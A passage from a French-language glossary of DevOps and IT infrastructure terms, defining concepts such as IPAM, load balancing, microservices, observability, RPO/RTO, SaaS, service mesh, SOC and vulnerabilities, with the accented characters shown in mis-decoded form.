menĂ©s. LâintĂ©gration continue dĂ©signe souvent lâĂ©tape de crĂ©ation ou dâintĂ©gration du processus de publication de logiciel et implique un aspect automatisĂ©. Les principaux objectifs de lâintĂ©gration continue sont de trouver et de corriger plus rapidement les bogues, dâamĂ©liorer la qualitĂ© des logiciels et de rĂ©duire le temps nĂ©cessaire pour valider et publier de nouvelles mises Ă jour de logiciels. IPAM IPAM, acronyme de âIP Address Managementâ (Gestion des adresses IP en français), est un ensemble de pratiques, de techniques et dâoutils utilisĂ©s pour planifier, gĂ©rer et suivre les adresses IP (Internet Protocol) au sein dâun rĂ©seau informatique. Load balancing ou Ă©quilibrage de charge Un Ă©quilibrage de charge, en anglais âload balancerâ, est un composant matĂ©riel ou logiciel utilisĂ© dans les environnements informatiques pour distribuer le trafic rĂ©seau entrant de maniĂšre Ă©quilibrĂ©e entre plusieurs serveurs ou ressources, afin dâoptimiser les performances, la fiabilitĂ© et la disponibilitĂ© des systĂšmes. Microservices vs Monolithe Une architecture microservices est une architecture logicielle basĂ©e sur de petits services autonomes qui peuvent ĂȘtre dĂ©veloppĂ©s, dĂ©ployĂ©s et Ă©voluĂ©s indĂ©pendamment. Cette architecture sâappuie sur des orchestrateurs de conteneurs. Un monolithe est une architecture logicielle oĂč lâensemble de lâapplication est conçu et construit comme une seule entitĂ© monolithique. Cela signifie que toutes les fonctionnalitĂ©s, les composants et les parties de lâapplication sont regroupĂ©s en un seul code source, une seule base de donnĂ©es et un seul exĂ©cutable. MutabilitĂ© vs ImmutabilitĂ© ImmutabilitĂ© : CaractĂšre de ce qui ne peut changer . Une infrastructure mutable est un systĂšme qui Ă©volue de maniĂšre incrĂ©mentale et donc mise Ă jour de maniĂšre continue. LâĂ©tat de lâinfrastructure est le rĂ©sultat dâune accumulation dâopĂ©rations pouvant ĂȘtre pour certaines manuelles. Par contre, une infrastructure immutable est un systĂšme qui nâest jamais modifiĂ© aprĂšs son dĂ©ploiement. Ce systĂšme devra en consĂ©quence avoir le moins de mutation possible, voire aucune. Par exemple, pour construire des images de VM immutables, vous pouvez utiliser Packer dâ HashiCorp pour ensuite les enregistrer en les versionnant dans votre gestionnaire dâArtĂ©facts. NOC Un NOC (Network Operations Center) est un centre opĂ©rationnel chargĂ© de surveiller, gĂ©rer et maintenir un rĂ©seau informatique ou de tĂ©lĂ©communications. Les Ă©quipes du NOC supervisent les performances du rĂ©seau, dĂ©tectent et rĂ©solvent les problĂšmes et effectuent la maintenance prĂ©ventive pour assurer le bon fonctionnement continu du rĂ©seau. ObservabilitĂ© Lâ observabilitĂ© est la capacitĂ© de surveiller, dâanalyser et de comprendre lâĂ©tat interne dâun systĂšme informatique en temps rĂ©el. Elle repose sur trois piliers principaux : les logs, les mĂ©triques et les traces. Des outils comme Prometheus et Grafana sont souvent utilisĂ©s pour lâobservabilitĂ©. Orchestration Lâorchestration est un processus automatique de gestion dâun systĂšme informatique. RPO Recovery Point Objective (RPO) fait gĂ©nĂ©ralement rĂ©fĂ©rence Ă la quantitĂ© de donnĂ©es qui peuvent ĂȘtre perdues au cours de la pĂ©riode la plus opportune pour une entreprise, avant quâun prĂ©judice important ne se produise, Ă partir dâun Ă©vĂ©nement critique jusquâĂ la sauvegarde la plus prĂ©cĂ©dente. RTO Recovery Time Objective (RTO) fait rĂ©fĂ©rence au temps pendant lequel une application, un systĂšme et/ou un processus peut ĂȘtre en panne sans causer de dommages importants Ă lâentreprise, ainsi quâau temps passĂ© Ă restaurer lâapplication et ses donnĂ©es. PAAS PaaS, ou âPlatform as a Serviceâ en anglais, se traduit en français par âPlateforme en tant que Serviceâ. Câest un modĂšle de cloud qui fournit une plateforme de dĂ©veloppement et dâexĂ©cution dâapplications sur le cloud. Ces services vont permettre aux dĂ©veloppeurs de crĂ©er, dĂ©ployer et gĂ©rer des applications sans se soucier de la gestion de lâinfrastructure sous-jacente. Provisioning ou Provisionnement Le provisioning est un processus dâallocation automatique de ressources informatiques. SAAS SaaS, ou âSoftware as a Serviceâ en anglais, se traduit en français âlogiciel en tant que serviceâ. Câest un modĂšle de distribution de logiciels dans lequel les applications sont hĂ©bergĂ©es et accessibles en ligne par le biais dâun fournisseur de services cloud. Au lieu dâinstaller et de gĂ©rer des logiciels localement sur un ordinateur ou un serveur, les utilisateurs peuvent accĂ©der Ă ces applications via Internet, gĂ©nĂ©ralement Ă partir dâun navigateur web. Scrum Un framework de gestion de projet Agile. Serverless Le Serverless est un modĂšle de dĂ©ploiement dans lequel les dĂ©veloppeurs nâont pas Ă gĂ©rer lâinfrastructure sous-jacente. Les fournisseurs cloud allouent dynamiquement les ressources nĂ©cessaires Ă lâexĂ©cution dâune application. Les exemples incluent AWS Lambda , Google Cloud Functions , et Azure Functions . Service Mesh Un Service Mesh est une infrastructure dĂ©diĂ©e Ă la gestion des communications entre microservices. Il fournit des fonctionnalitĂ©s comme le load balancing , la gestion des Ă©checs, le monitoring, et la sĂ©curisation des connexions via des proxies. Les outils populaires incluent Istio et Linkerd . SLA/SLO/SLI SLA (Service Level Agreement) : Contrat dĂ©finissant les attentes en termes de niveaux de service. SLO (Service Level Objective) : Objectifs prĂ©cis liĂ©s aux niveaux de performance dâun service (ex. : disponibilitĂ© Ă 99,9 %). SLI (Service Level Indicator) : Indicateur qui mesure un aspect de la performance, comme le temps de rĂ©ponse ou le taux dâerreur. SOC Un SOC (Security Operations Center) est similaire, mais se concentre spĂ©cifiquement sur la sĂ©curitĂ© informatique. Les Ă©quipes dâun SOC surveillent les menaces potentielles, dĂ©tectent les activitĂ©s suspectes, rĂ©pondent aux incidents de sĂ©curitĂ© et mettent en Ćuvre des mesures de dĂ©fense pour protĂ©ger les systĂšmes informatiques et les donnĂ©es contre les cyberattaques. Supervision La supervision est un processus de surveillance et de gestion des systĂšmes informatiques, des rĂ©seaux, des serveurs, des applications et dâautres composants de lâinfrastructure informatique. Elle vise Ă garantir que ces systĂšmes fonctionnent de maniĂšre fiable, sĂ©curisĂ©e et efficace. La supervision informatique peut ĂȘtre effectuĂ©e Ă lâaide de logiciels spĂ©cialisĂ©s qui collectent des donnĂ©es en temps rĂ©el sur les performances et lâĂ©tat des Ă©quipements informatiques. Virtualisation La virtualisation est une technologie qui permet de crĂ©er des versions virtuelles de tous Ă©lĂ©ments dâune infrastructure informatique comme des serveurs, des Ă©quipements rĂ©seaux ou dâautres entitĂ©s informatiques. Elle vise Ă isoler et Ă abstraire ces Ă©lĂ©ments pour les rendre indĂ©pendants des ressources physiques sous-jacentes, ce qui permet une utilisation plus efficace et flexible de ces ressources. Elle est couramment utilisĂ©e dans des domaines tels que la virtualisation de serveur, la virtualisation de stockage, la virtualisation de rĂ©seau, la virtualisation de bureau et plus encore. VulnĂ©rabilitĂ© Une vulnĂ©rabilitĂ© est une faiblesse du code qui introduit ce quâon appelle une faille de sĂ©curitĂ©. Ces failles peuvent ĂȘtre prĂ©sentes dans un systĂšme dâexploitation, un logiciel, un Ă©quipement de rĂ©seau ou un processus. Elles peuvent ĂȘtre exploitĂ©es par des acteurs malveillants pour causer un dommage, un accĂšs non autorisĂ©, des pertes de donnĂ©es, ou dâautres problĂšmes de sĂ©curitĂ©. Pour dĂ©tecter la prĂ©sence des vulnĂ©rabilitĂ©s, on fait appel Ă des outils dâanalyse de code et de dĂ©tection.